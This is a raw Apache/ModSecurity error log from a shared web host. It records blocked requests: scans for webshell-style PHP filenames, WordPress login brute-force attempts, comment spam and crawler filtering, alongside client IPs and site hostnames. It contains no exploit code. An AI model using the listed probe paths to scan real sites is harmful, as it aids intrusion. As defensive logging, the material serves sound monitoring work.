[Tue May 26 16:59:57.416051 2026] [security2:error] [pid 839808:tid 840006] [client 20.104.227.76:51825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/sf.php"] [unique_id "ahWENZqtwAfohijxAqht_wAAAUw"]
[Tue May 26 16:59:57.416210 2026] [security2:error] [pid 839808:tid 840006] [client 20.104.227.76:51825] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/sf.php"] [unique_id "ahWENZqtwAfohijxAqht_wAAAUw"]
[Tue May 26 16:59:57.652191 2026] [security2:error] [pid 839808:tid 840009] [client 20.104.227.76:51760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/a.php"] [unique_id "ahWENZqtwAfohijxAqhuCQAAAU8"]
[Tue May 26 16:59:57.652304 2026] [security2:error] [pid 839808:tid 840009] [client 20.104.227.76:51760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/a.php"] [unique_id "ahWENZqtwAfohijxAqhuCQAAAU8"]
[Tue May 26 16:59:57.932139 2026] [security2:error] [pid 839808:tid 839984] [client 20.104.227.76:52269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/k.php"] [unique_id "ahWENZqtwAfohijxAqhuEgAAATY"]
[Tue May 26 16:59:57.932252 2026] [security2:error] [pid 839808:tid 839984] [client 20.104.227.76:52269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/k.php"] [unique_id "ahWENZqtwAfohijxAqhuEgAAATY"]
[Tue May 26 16:59:58.212402 2026] [security2:error] [pid 839808:tid 839969] [client 20.104.227.76:51821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ini.php"] [unique_id "ahWENpqtwAfohijxAqhuHQAAASc"]
[Tue May 26 16:59:58.212541 2026] [security2:error] [pid 839808:tid 839969] [client 20.104.227.76:51821] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ini.php"] [unique_id "ahWENpqtwAfohijxAqhuHQAAASc"]
[Tue May 26 16:59:58.521588 2026] [security2:error] [pid 839808:tid 839981] [client 185.191.171.12:11214] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWENpqtwAfohijxAqhuIwAAATM"]
[Tue May 26 16:59:58.521696 2026] [security2:error] [pid 839808:tid 839981] [client 185.191.171.12:11214] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/6/"] [unique_id "ahWENpqtwAfohijxAqhuIwAAATM"]
[Tue May 26 16:59:58.585699 2026] [security2:error] [pid 839808:tid 839987] [client 20.104.227.76:52250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/ca4.php"] [unique_id "ahWENpqtwAfohijxAqhuJwAAATk"]
[Tue May 26 16:59:58.585852 2026] [security2:error] [pid 839808:tid 839987] [client 20.104.227.76:52250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/ca4.php"] [unique_id "ahWENpqtwAfohijxAqhuJwAAATk"]
[Tue May 26 16:59:58.599446 2026] [security2:error] [pid 839808:tid 839957] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWENZqtwAfohijxAqhuBQAAARs"]
[Tue May 26 16:59:58.956859 2026] [security2:error] [pid 839808:tid 839965] [client 20.104.227.76:51833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWENpqtwAfohijxAqhuLAAAASM"]
[Tue May 26 16:59:58.956958 2026] [security2:error] [pid 839808:tid 839965] [client 20.104.227.76:51833] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-admin/includes/index.php"] [unique_id "ahWENpqtwAfohijxAqhuLAAAASM"]
[Tue May 26 16:59:59.174451 2026] [security2:error] [pid 839808:tid 840034] [client 20.104.227.76:51796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-info.php"] [unique_id "ahWEN5qtwAfohijxAqhuMAAAAWg"]
[Tue May 26 16:59:59.174575 2026] [security2:error] [pid 839808:tid 840034] [client 20.104.227.76:51796] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/wp-info.php"] [unique_id "ahWEN5qtwAfohijxAqhuMAAAAWg"]
[Tue May 26 16:59:59.328305 2026] [security2:error] [pid 839808:tid 839973] [client 20.104.227.76:52305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/init.php"] [unique_id "ahWEN5qtwAfohijxAqhuOQAAASs"]
[Tue May 26 16:59:59.328410 2026] [security2:error] [pid 839808:tid 839973] [client 20.104.227.76:52305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/init.php"] [unique_id "ahWEN5qtwAfohijxAqhuOQAAASs"]
[Tue May 26 16:59:59.470485 2026] [security2:error] [pid 839808:tid 840055] [client 114.119.146.171:42789] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/regalia/"] [unique_id "ahWEN5qtwAfohijxAqhuPQAAAX0"], referer: https://www.gciamd.org.in/regalia?lightbox=dataItem-k8fydqkw1
[Tue May 26 16:59:59.733343 2026] [security2:error] [pid 839808:tid 839946] [client 20.104.227.76:51224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/100.php"] [unique_id "ahWEN5qtwAfohijxAqhuRQAAARA"]
[Tue May 26 16:59:59.733444 2026] [security2:error] [pid 839808:tid 839946] [client 20.104.227.76:51224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/100.php"] [unique_id "ahWEN5qtwAfohijxAqhuRQAAARA"]
[Tue May 26 16:59:59.909474 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/fm.php"] [unique_id "ahWEN5qtwAfohijxAqhuTAAAATQ"]
[Tue May 26 16:59:59.909580 2026] [security2:error] [pid 839808:tid 839982] [client 20.104.227.76:51788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/fm.php"] [unique_id "ahWEN5qtwAfohijxAqhuTAAAATQ"]
[Tue May 26 17:00:00.032198 2026] [security2:error] [pid 839808:tid 839913] [remote 129.211.218.71:45676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.218.211.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWEN5qtwAfohijxAqhuSwABPGY"]
[Tue May 26 17:00:00.094493 2026] [security2:error] [pid 839808:tid 839971] [client 20.104.227.76:50782] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1574"] [id "900936"] [msg "Empty UA autodiscover"] [hostname "autodiscover.athelstan.org.in"] [uri "/z.ph"] [unique_id "ahWEOJqtwAfohijxAqhuUQAAASk"]
[Tue May 26 17:00:00.094611 2026] [security2:error] [pid 839808:tid 839971] [client 20.104.227.76:50782] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "autodiscover.athelstan.org.in"] [uri "/z.ph"] [unique_id "ahWEOJqtwAfohijxAqhuUQAAASk"]
[Tue May 26 17:00:00.275875 2026] [security2:error] [pid 839808:tid 840057] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEN5qtwAfohijxAqhuNAAAAX8"]
[Tue May 26 17:00:00.343541 2026] [security2:error] [pid 839808:tid 840037] [client 20.104.227.76:50786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/xroot7.php"] [unique_id "ahWEOJqtwAfohijxAqhuVQAAAWs"]
[Tue May 26 17:00:00.343663 2026] [security2:error] [pid 839808:tid 840037] [client 20.104.227.76:50786] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/xroot7.php"] [unique_id "ahWEOJqtwAfohijxAqhuVQAAAWs"]
[Tue May 26 17:00:00.523865 2026] [security2:error] [pid 839808:tid 840067] [client 20.104.227.76:50232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.athelstan.org.in"] [uri "/mini.php"] [unique_id "ahWEOJqtwAfohijxAqhuWAAAAYk"]
[Tue May 26 17:00:00.523952 2026] [security2:error] [pid 839808:tid 840067] [client 20.104.227.76:50232] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.athelstan.org.in"] [uri "/mini.php"] [unique_id "ahWEOJqtwAfohijxAqhuWAAAAYk"]
[Tue May 26 17:00:00.920188 2026] [security2:error] [pid 839808:tid 839922] [remote 212.224.100.2:27830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWEOJqtwAfohijxAqhuXwABbW8"]
[Tue May 26 17:00:01.259863 2026] [proxy:error] [pid 839808:tid 839936] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:00:01.259910 2026] [proxy_http:error] [pid 839808:tid 839936] [remote 16.148.188.168:44162] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:00:01.260487 2026] [proxy:error] [pid 839808:tid 839936] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:00:01.260521 2026] [proxy_http:error] [pid 839808:tid 839936] [remote 16.148.188.168:44162] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:00:01.352853 2026] [proxy:error] [pid 839808:tid 839923] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:00:01.352937 2026] [proxy_http:error] [pid 839808:tid 839923] [remote 16.148.188.168:44162] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:00:01.353814 2026] [proxy:error] [pid 839808:tid 839923] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:00:01.353862 2026] [proxy_http:error] [pid 839808:tid 839923] [remote 16.148.188.168:44162] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:00:05.114887 2026] [security2:error] [pid 839808:tid 840046] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWEPJqtwAfohijxAqhumgAAAXQ"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 17:00:05.157874 2026] [security2:error] [pid 839808:tid 839980] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEOZqtwAfohijxAqhudAAAATI"]
[Tue May 26 17:00:05.540720 2026] [security2:error] [pid 839808:tid 839967] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEO5qtwAfohijxAqhufwAAASU"]
[Tue May 26 17:00:06.184803 2026] [security2:error] [pid 839808:tid 839958] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEPJqtwAfohijxAqhukQAAARw"]
[Tue May 26 17:00:07.565941 2026] [security2:error] [pid 839808:tid 840002] [client 185.231.155.169:64018] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.231.155.169" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWEP5qtwAfohijxAqhuzwAAAUg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 17:00:07.566027 2026] [security2:error] [pid 839808:tid 840002] [client 185.231.155.169:64018] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWEP5qtwAfohijxAqhuzwAAAUg"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 17:00:07.658279 2026] [security2:error] [pid 839808:tid 840066] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEPpqtwAfohijxAqhuvAAAAYg"]
[Tue May 26 17:00:08.390999 2026] [security2:error] [pid 839808:tid 839963] [client 123.28.15.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEP5qtwAfohijxAqhuyQAAASE"]
[Tue May 26 17:00:09.293584 2026] [security2:error] [pid 839808:tid 840042] [client 113.160.132.26:18226] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "113.160.132.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWEQZqtwAfohijxAqhu7wAAAXA"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 17:00:09.296414 2026] [security2:error] [pid 839808:tid 840042] [client 113.160.132.26:18226] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWEQZqtwAfohijxAqhu7wAAAXA"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 17:00:10.590083 2026] [security2:error] [pid 839808:tid 840060] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEQZqtwAfohijxAqhu9QAAAYI"]
[Tue May 26 17:00:12.300641 2026] [security2:error] [pid 839808:tid 839996] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEQ5qtwAfohijxAqhvFgAAAUI"]
[Tue May 26 17:00:14.505452 2026] [security2:error] [pid 839808:tid 839823] [remote 103.230.156.120:54860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWERpqtwAfohijxAqhvWQABFgw"]
[Tue May 26 17:00:15.064148 2026] [security2:error] [pid 839808:tid 840025] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWERZqtwAfohijxAqhvSwAAAV8"]
[Tue May 26 17:00:15.201811 2026] [core:error] [pid 839808:tid 839942] [client 74.7.175.142:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:00:15.201830 2026] [core:error] [pid 839808:tid 839942] [client 74.7.175.142:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:00:15.201954 2026] [security2:error] [pid 839808:tid 839942] [client 74.7.175.142:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.new.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWER5qtwAfohijxAqhvbAAAAQw"]
[Tue May 26 17:00:15.202590 2026] [security2:error] [pid 839808:tid 839987] [client 74.7.175.142:33462] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.new.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWER5qtwAfohijxAqhvagABOX4"]
[Tue May 26 17:00:17.971895 2026] [security2:error] [pid 839808:tid 839945] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWER5qtwAfohijxAqhvcwAAAQ8"]
[Tue May 26 17:00:18.696932 2026] [security2:error] [pid 839808:tid 840011] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWESJqtwAfohijxAqhvjgAAAVE"]
[Tue May 26 17:00:19.752317 2026] [security2:error] [pid 839808:tid 839979] [client 172.71.148.105:10224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahWESpqtwAfohijxAqhvrQAAATE"]
[Tue May 26 17:00:20.159514 2026] [security2:error] [pid 839808:tid 840064] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWESpqtwAfohijxAqhvsQAAAYY"]
[Tue May 26 17:00:21.654306 2026] [security2:error] [pid 839808:tid 839840] [remote 74.7.241.58:43100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWETZqtwAfohijxAqhv5wABex0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:00:21.701825 2026] [security2:error] [pid 839808:tid 840024] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWETJqtwAfohijxAqhvzgAAAV4"]
[Tue May 26 17:00:23.222640 2026] [security2:error] [pid 839808:tid 839986] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWETpqtwAfohijxAqhv7wAAATg"]
[Tue May 26 17:00:23.618705 2026] [security2:error] [pid 839808:tid 839910] [remote 51.195.244.79:26128] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "osmsi.org.in"] [uri "/robots.txt"] [unique_id "ahWET5qtwAfohijxAqhwDQABUWM"]
[Tue May 26 17:00:23.618943 2026] [security2:error] [pid 839808:tid 840011] [client 51.195.244.79:26128] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "osmsi.org.in"] [uri "/robots.txt"] [unique_id "ahWET5qtwAfohijxAqhwDQABUWM"]
[Tue May 26 17:00:24.723206 2026] [security2:error] [pid 839808:tid 839864] [remote 51.75.236.136:16354] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahWEUJqtwAfohijxAqhwJwABKDU"]
